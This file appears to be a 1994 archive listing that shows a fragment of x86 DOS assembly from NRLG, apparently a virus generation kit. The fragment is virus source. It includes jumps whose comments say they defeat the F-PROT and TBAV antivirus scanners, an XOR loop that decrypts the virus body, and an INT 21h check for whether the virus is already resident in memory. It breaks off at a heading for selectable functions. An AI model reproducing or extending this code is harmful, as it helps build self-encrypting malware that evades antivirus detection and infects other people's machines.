home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / NRLG.ZIP / 2.N1 < prev    next >
Text File  |  1994-02-03  |  2KB  |  39 lines

  1. inc di
  2. inc di
  3. ;----------------------------------------------------------                                                
  4. jmp bye                      ;######## BYE BYE F-PROT ! ##########     
  5. mov ah,4ch
  6. int 21h
  7. bye:                         ;#### HEY FRIDRIK! IS ONLY A JMP!!###      
  8. ;-----------------------------------------------------------                               
  9. mov ah,0bh                   ;######### BYE BYE TBAV ! ##########     
  10. int 21h                      ;### (CANGE INT AT YOU PLEASURE) ###        
  11. ;----------------------------------------------------------                                   
  12. loop deci                    ;repeat please!               
  13.                              ;           
  14. ;*****************************************************************
  15. ;                   #2 DECRYPT ROUTINE                                                    
  16. ;*****************************************************************
  17.                               ;    
  18. crypt:                        ;fuck label!                  
  19.                               ;                
  20. mov cx,offset fin             ;cx = large of virus                 
  21. lea di,[offset crypt2] + bp   ;di = first byte to decrypt                  
  22. ;---------------------------------------------------------------                                              
  23. deci2:                        ;              
  24. xor byte ptr cs:[di],1        ;decrytion rutine          
  25. inc di                        ;very simple...            
  26. loop deci2                    ;           
  27. ;---------------------------------------------------------------
  28. crypt2:                       ;fuck label!          
  29.                               ;                  
  30. MOV AX,0CACAH                 ;call to my resident interrup mask                  
  31. INT 21H                       ;for chek "I'm is residet?"   
  32. CMP Bh,0CAH                   ;is equal to CACA?
  33. JE PUM2                       ;yes! jump to runnig program
  34. call action
  35. ;*****************************************************************
  36. ; NRLG FUNCTIONS  (SELECTABLE)
  37. ;*****************************************************************
  38.  
  39.